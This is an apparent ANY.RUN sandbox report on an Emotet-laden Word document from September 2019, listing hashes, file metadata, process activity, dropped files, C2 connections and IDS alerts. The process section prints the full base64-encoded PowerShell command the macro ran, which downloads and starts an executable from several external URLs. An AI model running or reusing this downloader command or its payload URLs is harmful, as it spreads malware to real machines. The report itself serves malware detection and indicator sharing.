analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dok_2019_09_ 19_DE839556.doc

Full analysis: https://app.any.run/tasks/7b854db9-0f58-4b69-b8fc-41f5ce0dc97c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 12:23:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: seize mobile Handmade Fresh Chicken, Subject: generating, Author: Meagan Kuvalis, Comments: Kuwaiti Dinar, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 08:11:00 2019, Last Saved Time/Date: Thu Sep 19 08:11:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

16A064689918137707FC9E92671FA681

SHA1:

E7FE088857FC5B07B08C461363CFCFA9CE9DDF97

SHA256:

820C65C6EF01642AB6280B5CC80F98B24572841D5BCEC34769037BDE8B3D2CD0

SSDEEP:

6144:dxNVifQ2eqPobQZbrwIQOVPLkIq7NSU4jJntATfDQ3XvbbD:dxNVifQ2eqPobQZbrwIQOFXq7NSU4VeU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 71.exe (PID: 2340)
      • 71.exe (PID: 4008)
      • 71.exe (PID: 3388)
      • 71.exe (PID: 3488)
      • easywindow.exe (PID: 2416)
      • easywindow.exe (PID: 3304)
      • easywindow.exe (PID: 2248)
      • easywindow.exe (PID: 3452)
    • Emotet process was detected

      • 71.exe (PID: 2340)
    • EMOTET was detected

      • easywindow.exe (PID: 2248)
    • Connects to CnC server

      • easywindow.exe (PID: 2248)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2732)
    • Creates files in the user directory

      • powershell.exe (PID: 2732)
    • Executed via WMI

      • powershell.exe (PID: 2732)
    • Starts itself from another location

      • 71.exe (PID: 2340)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2732)
      • 71.exe (PID: 2340)
    • Connects to server without host name

      • easywindow.exe (PID: 2248)
    • Application launched itself

      • taskmgr.exe (PID: 3260)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3592)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3592)
    • Manual execution by user

      • taskmgr.exe (PID: 3260)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: seize mobile Handmade Fresh Chicken
Subject: generating
Author: Meagan Kuvalis
Keywords: -
Comments: Kuwaiti Dinar
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 07:11:00
ModifyDate: 2019:09:19 07:11:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Zulauf and Sons
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kohler
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
12
Malicious processes
5
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 71.exe no specs 71.exe no specs 71.exe no specs #EMOTET 71.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe taskmgr.exe no specs taskmgr.exe

Process information

PID
CMD
Path
Indicators
Parent process
3592"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Dok_2019_09_ 19_DE839556.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2732powershell -encod JABhAE0AUABjAFoAMwBqAD0AJwBZAFgAaAB3AE0AagAnADsAJABSAGkAUwBUADAAcAAgAD0AIAAnADcAMQAnADsAJABiAE0ATQA2AFAAbwA9ACcAdABiAHEAMwAyAFoARABrACcAOwAkAG4AVgBBADkAMgA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABSAGkAUwBUADAAcAArACcALgBlAHgAZQAnADsAJABsAEkAMQA0AHoAYQA2AD0AJwBmAFcASQBDAE8AUQB3ACcAOwAkAGwAdQBIAEMAbgBaAFMAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAGIAQwBsAEkAZQBOAHQAOwAkAHQARgBrADMARgBOAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB1AG4AaQB0AGUAZABtAGUAZABzAHMAaABvAHAALgBjAG8AbQAvAHgAeABqAHkAdwAvAEgAbgBGAFoASQBLAFIALwBAAGgAdAB0AHAAOgAvAC8AYwBlAG4AZwBpAHoAZwB1AGwAZQByAC4AYwBvAG0ALgB0AHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AUgB2AHAASABiAHkAZQAvAEAAaAB0AHQAcABzADoALwAvAGsAZQB0AG8AcgBlAGMAaQBwAGUAcwBsAGMAaABmAC4AcwBpAHQAZQAvAHQAZQBzAHQALwByADQAaQBhAGQALQBiAG0AMABpADcAZgAtADcANwAwADcAOAA1AC8AQABoAHQAdABwAHMAOgAvAC8AYgBvAG4AZABiAGUAbgBnAGEAbABzAC4AaQBuAGYAbwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBpADYAMQAzADQALQA5AGYAMAAtADEANwA0ADcAMAAwADYAOAAvAEAAaAB0AHQAcABzADoALwAvAGIAaQBrAGUAbABvAHYAZQByAHMALgBiAGwAbwBnAC4AYgByAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ATQBnAHEARQBtAGIAQgBCAC8AJwAuACIAUwBgAFAAbABJAHQAIgAoACcAQAAnACkAOwAkAEkAbAA4AG0AdQBjAEEAPQAnAEoAbgAwAGQATABMAEcAVgAnADsAZgBvAHIAZQBhAGMAaAAoACQASQB6AEUAegA4AGgAbQAwACAAaQBuACAAJAB0AEYAawAzAEYATgApAHsAdAByAHkAewAkAGwAdQBIAEMAbgBaAFMALgAiAEQAYABPAGAAdwBuAEwATwBBAEQARgBgAGkATABlACIAKAAkAEkAegBFAHoAOABoAG0AMAAsACAAJABuAFYAQQA5ADIAOAApADsAJABoAFgAegBBADMARQBHAD0AJwBWAGIAbQBDAFIAZgBaAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABuAFYAQQA5ADIAOAApAC4AIgBMAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIAOQA0ADAANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABuAFYAQQA5ADIAOAApADsAJABVADQAdgBmAHUAdgBsAD0AJwB6ADcANQBVAGQAZAAnADsAYgByAGUAYQBrADsAJABpAEUAaABuADMAUgBxAD0AJwBpAHIAMAB3AHYAbgBPACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAG8AbgBSAFIASABpADAAYQA9ACcAYwBSAGsAdwBTAEIAMgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4008"C:\Users\admin\71.exe" C:\Users\admin\71.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3388"C:\Users\admin\71.exe" C:\Users\admin\71.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3488--70766e04C:\Users\admin\71.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2340--70766e04C:\Users\admin\71.exe
71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2416"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe71.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3304"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3452--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2248--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 830
Read events
1 329
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3592WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C35.tmp.cvr
MD5:
SHA256:
3592WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3592WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D41317F.wmfwmf
MD5:AAFC0F9D845A3481754EB1C43CA92F3E
SHA256:86C6180E820653C9599278883C55F98093B2AC36103642997B5AE969503CAA69
3592WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\486987A2.wmfwmf
MD5:46DEF7EFD221D616992CAD86F6682134
SHA256:1958BE16E1D093337194F8CC2C906C84630FF348AB5FC9DE0B7433DF6C81CFAE
3592WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$k_2019_09_ 19_DE839556.docpgc
MD5:1BCAF86A18374636DA4C61FC913F5637
SHA256:0CF3579DF5C0471DF5684964589A51B166B2E84F3730B3CBF31542830888FB98
3592WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8386F3B.wmfwmf
MD5:55676B3AAD8C17884EBAA6E1D640EF41
SHA256:D629E5A9C1AAF5CCBD64C6030040643E3324B93E3E76BE0192027FF77DFC7327
3592WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C4DFFF3.wmfwmf
MD5:BF95A9CB2984B5B2E437426F2726939C
SHA256:004D4F23163AD9846CAE92B51152BE7F3758B0368AE22D729D2B12129B9A8219
3592WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0D30AB7.wmfwmf
MD5:ABF8543660116F4B4A31AE5A55794C25
SHA256:126C52DEC17A00A6562AF67DF22FAF64327EEC21F71EAFE1DA7AD2841D7A20C2
3592WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B6F1D74.wmfwmf
MD5:7867DB96D78F7643F62A556FFB07DF9E
SHA256:98D40A7DDB46F745ECCB981FD0811EF6E02AA5808D14497F90D815BDD50ED989
3592WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C73C0801.wmfwmf
MD5:9D15E5C92CB48A56FB2A87294CD69EA3
SHA256:0273697DE029F09B7578308E38C94C20CEED535E1BD71AAAEB5096A3ECE4772A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2248
easywindow.exe
POST
78.109.34.178:443
http://78.109.34.178:443/splash/jit/ringin/
RU
malicious
2248
easywindow.exe
POST
404
70.45.30.28:80
http://70.45.30.28/window/loadan/
PR
html
548 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2248
easywindow.exe
70.45.30.28:80
San Juan Cable, LLC
PR
malicious
2248
easywindow.exe
78.109.34.178:443
MTS PJSC
RU
malicious
2732
powershell.exe
104.28.27.31:443
www.unitedmedsshop.com
Cloudflare Inc
US
shared
2248
easywindow.exe
83.110.75.153:8090
Emirates Telecommunications Corporation
AE
malicious
2248
easywindow.exe
152.168.220.188:80
CABLEVISION S.A.
AR
malicious

DNS requests

Domain
IP
Reputation
www.unitedmedsshop.com
  • 104.28.27.31
  • 104.28.26.31
unknown

Threats

PID
Process
Class
Message
2248
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2248
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2248
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2248
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
2248
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2248
easywindow.exe
Generic Protocol Command Decode
SURICATA STREAM CLOSEWAIT FIN out of window
2248
easywindow.exe
Generic Protocol Command Decode
SURICATA STREAM CLOSEWAIT FIN out of window
6 ETPRO signatures available at the full report
No debug info